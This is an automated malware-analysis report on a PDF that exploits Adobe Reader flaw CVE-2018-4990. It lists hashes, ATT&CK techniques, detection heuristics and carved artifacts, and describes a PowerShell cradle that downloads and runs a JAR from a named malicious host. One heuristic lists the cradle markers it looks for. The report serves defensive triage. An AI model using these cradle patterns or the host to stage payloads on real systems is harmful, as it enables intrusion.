Malicious PDF — malware analysis report

Static analysis result for SHA-256 34102b65d721ec9c…

MALICIOUS

PDF

42.6 KB
MD5: ee8e145df5016033325a06700f12090a SHA-1: 29e0492ba1690bb5a4f231073c1ac38f327eaf0a SHA-256: 34102b65d721ec9c078ae88fdf38108b3b1b4bdebeb9347c9346ec0ac3fcaa0b
428 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.001 PowerShell T1105 Ingress Tool Transfer

The sample is a PDF exploiting CVE-2018-4990, which is indicated by multiple critical heuristics. The embedded script contains a PowerShell command-line cradle that downloads a JAR file from 'http://specforce.space' to the user's temporary directory and then executes it. This indicates a downloader or dropper functionality.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9237

Heuristics 11

  • Adobe Reader JPEG2000 JPX command payload exploit — CVE-2018-4990 critical CVE likely CVE_2018_4990_JPX_EMBEDDED_CMD
    PDF embeds a malformed JPX/JPEG2000 image whose JP2 header area contains a command-execution/download payload.
  • JPXDecode + active content — JPEG2000 CVE-family indicator high CVE related PDF_JPX_CVE_2018_4990_RELATED
    PDF uses /JPXDecode (JPEG2000) alongside JavaScript, XFA, or RichMedia indicators. This matches the delivery pattern for Adobe Reader JPEG2000 parser exploit families, including CVE-2018-4990, but does not prove the exact malformed JP2/JPX primitive.
  • Malformed JPEG2000/JP2 box structure high CVE related PDF_JP2_BOX_ANOMALY
    PDF embeds JPEG2000/JP2 data with malformed box sizes. This is a parser-exploit indicator for JPX/JPEG2000 CVE families, not a unique CVE fingerprint.
  • PowerShell download cradle in PDF action body critical PDF_PS_DOWNLOAD_CRADLE
    PDF contains a PowerShell download-and-execute cradle (IEX/Invoke-Expression of a remote payload, [Net.WebClient]/[Net.ServicePointManager], or `-ep Bypass -enc <base64>`). These strings are rare in benign PDFs and are strong evidence of payload staging in an attack chain (MITRE T1059.001 + T1105).
  • ClamAV: Win.Exploit.CVE_2018_4990-6599478-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Exploit.CVE_2018_4990-6599478-0
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator the sample is a delivery vehicle.
  • Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://specforce.space
    • http://specforce.space\
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
stream_011_off00003c6a.bin
ccbd3da6d37a95e3812c47bd788bff8e2e17f7ccceef12aa4b74f370023e1edb		 decompressed-pdf-stream PDF FlateDecoded stream at offset 0x3C6A 4421 bytes
embedded_pdf_script_00006617.bin
47a56d61318c58b379b3973aafad28443d3045195e961a47bc30cdcc0e855e12		 pdf-embedded-script PDF raw stream script payload at offset 0x6617 2123 bytes
Detection
ClamAV: Win.Exploit.CVE_2018_4990-6599478-0
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s).
font_00_cff_off0000222b.bin
3ad89875e6fb7800b92b2a7d51b20b4698616ec3f17bd584488b4745cd64e011		 pdf-font-stream PDF embedded font (cff) at offset 0x222B 1578 bytes
font_01_cff_off000029bd.bin
3a17193309221acd3b14a1e6df5d926a7a593cd7f9157854e6522e53f84f7ae5		 pdf-font-stream PDF embedded font (cff) at offset 0x29BD 5575 bytes
font_03_cff_off00004b2a.bin
edbe3f1c296d2b7929f185c6c434feb1b033d2ed4a58a89c1b7c4c18a780461e		 pdf-font-stream PDF embedded font (cff) at offset 0x4B2A 7550 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.